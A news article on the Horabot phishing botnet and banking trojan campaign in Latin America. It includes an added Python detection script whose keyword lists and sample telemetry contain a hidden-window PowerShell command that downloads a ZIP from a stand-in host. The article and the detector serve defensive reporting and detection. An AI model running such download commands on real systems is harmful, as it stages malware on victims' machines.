Horabot Malware Targets Latin American Victims

Since late 2020, Spanish-speaking individuals in Latin America have faced a new form of malware known as Horabot. This botnet malware allows a threat actor to take control of a victim's Outlook mailbox, extract email addresses from their contacts, and send phishing emails with malicious HTML attachments to all the addresses in the victim's mailbox. Additionally, the botnet program delivers a Windows-based financial trojan and a spam tool, which are used to gather online banking credentials and compromise Gmail, Outlook, and Yahoo! webmail accounts for the purpose of sending out spam emails.

According to Cisco Talos researcher Chetan Raghuprasad, the majority of infections have been found in Mexico, with a smaller number of victims identified in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama. The threat actor responsible for this campaign is believed to be based in Brazil.

The campaign primarily targets users in the accounting, construction and engineering, wholesale distribution, and investment sectors, although it is suspected that other industries in the region may also be affected.

Attack Vector and Mode of Operation

The attack begins with phishing emails that entice recipients with tax-themed lures, encouraging them to open an HTML attachment. This attachment contains a link that leads to a RAR archive. Opening the archive triggers the execution of a PowerShell downloader script, which retrieves a ZIP file containing the main payloads from a remote server and reboots the victim's machine.

The system restart serves as a launching point for the banking trojan and the spam tool, enabling the threat actor to steal data, record keystrokes, capture screenshots, and send additional phishing emails to the victim's contacts.
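The chain described above has a recognisable shape on an endpoint: an archive is opened, PowerShell downloads a ZIP, and the machine is rebooted shortly afterwards. The script below is an added, defender-side example written for this article; it is not code from Cisco Talos or from the Horabot samples. It correlates process events per host in that order within a time window. The event fields, the process image names, the command-line keywords, the hostnames, URLs and timestamps are all constructed assumptions, and the page gives no indicators that could be embedded here.

```python
"""Correlate constructed endpoint process events for a three-stage sequence:
archive opened -> PowerShell fetches a .zip -> reboot. Added example; every
field name, image name and sample value below is an assumption, not a Horabot IoC."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    ts: int       # seconds (constructed values; any monotonic clock works)
    image: str    # process image file name
    cmdline: str  # full command line


# Order in which the stages must appear on one host
STAGES = ("archive_open", "ps_zip_download", "reboot")


def stage_of(ev: ProcEvent) -> Optional[str]:
    """Map one process event to a stage name, or None if it matches no stage."""
    img = ev.image.lower()
    cmd = ev.cmdline.lower()
    if img in ("winrar.exe", "7zfm.exe", "7z.exe") and ".rar" in cmd:
        return "archive_open"
    if img in ("powershell.exe", "pwsh.exe"):
        fetch = ("downloadfile", "downloadstring", "invoke-webrequest",
                 "iwr ", "start-bitstransfer")
        if ".zip" in cmd and any(k in cmd for k in fetch):
            return "ps_zip_download"
        if "restart-computer" in cmd:
            return "reboot"
    if img == "shutdown.exe" and "/r" in cmd.split():
        return "reboot"
    return None


def detect_chain(events: List[ProcEvent], window: int = 900
                 ) -> List[Tuple[str, List[ProcEvent]]]:
    """Return (host, events) for every host where all STAGES occur in order
    within `window` seconds of the first stage. A stage seen out of order is
    ignored; a fresh archive open restarts the chain."""
    by_host: Dict[str, List[ProcEvent]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_host.setdefault(ev.host, []).append(ev)

    hits: List[Tuple[str, List[ProcEvent]]] = []
    for host, evs in by_host.items():
        chain: List[ProcEvent] = []
        idx = 0
        for ev in evs:
            stage = stage_of(ev)
            if stage is None:
                continue
            if chain and ev.ts - chain[0].ts > window:
                chain, idx = [], 0          # too slow to be one chain; start over
            if stage == STAGES[idx]:
                chain.append(ev)
                idx += 1
            elif stage == STAGES[0]:
                chain, idx = [ev], 1        # new archive open restarts the chain
            if idx == len(STAGES):
                hits.append((host, list(chain)))
                chain, idx = [], 0
    return hits


# Constructed sample telemetry: one full chain, one benign ZIP download,
# one archive open followed hours later by an unrelated reboot.
SAMPLE_EVENTS = [
    ProcEvent("ws-mx-01", 1000, "WinRAR.exe",
              r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\ana\Downloads\factura_2023.rar"'),
    ProcEvent("ws-mx-01", 1045, "powershell.exe",
              "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
              "'http://example.invalid/a.zip','C:\\Users\\ana\\AppData\\Local\\Temp\\a.zip')"),
    ProcEvent("ws-mx-01", 1090, "shutdown.exe", "shutdown.exe /r /t 0"),
    ProcEvent("ws-mx-02", 2000, "powershell.exe",
              "powershell.exe Invoke-WebRequest https://intranet.invalid/tools.zip -OutFile tools.zip"),
    ProcEvent("ws-mx-03", 3000, "WinRAR.exe", r'"WinRAR.exe" "C:\Users\luis\Downloads\fotos.rar"'),
    ProcEvent("ws-mx-03", 9000, "shutdown.exe", "shutdown.exe /r /t 0"),
]


if __name__ == "__main__":
    for host, chain in detect_chain(SAMPLE_EVENTS):
        print(f"{host}: {' -> '.join(stage_of(e) or '?' for e in chain)}")
```

Only `ws-mx-01` is reported: the lone PowerShell ZIP download on `ws-mx-02` is a routine admin action and never becomes a chain, and on `ws-mx-03` the reboot is both out of order and outside the window. The window and keyword lists are tuning knobs; in a real deployment they would be fed from the EDR's process-creation events rather than from the constructed list here.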

Chetan Raghuprasad describes this campaign as a multi-stage attack that starts with a phishing email and proceeds to deliver payloads using a PowerShell downloader script and sideloading legitimate executables.

The banking trojan, written in the Delphi programming language, is a 32-bit Windows DLL that shares similarities with other Brazilian malware families like Mekotio and Casbaneiro.

On the other hand, Horabot is a PowerShell-based phishing botnet program specifically designed for Outlook. It propagates the infection by sending phishing emails to all email addresses found in the victim's mailbox, and its purpose is to conceal the threat actor's phishing infrastructure.

This disclosure comes shortly after SentinelOne attributed a prolonged campaign targeting over 30 Portuguese financial institutions to an unknown Brazilian threat actor using information-stealing malware since 2021.

Additionally, a new Android banking trojan called PixBankBot has been discovered, which exploits the accessibility services of the operating system to conduct fraudulent money transfers via the Brazilian PIX payments platform. PixBankBot is the latest in a series of malware specifically targeting Brazilian banks, joining the ranks of BrasDex, PixPirate, and GoatRAT, which have been observed in recent months.

June 5, 2023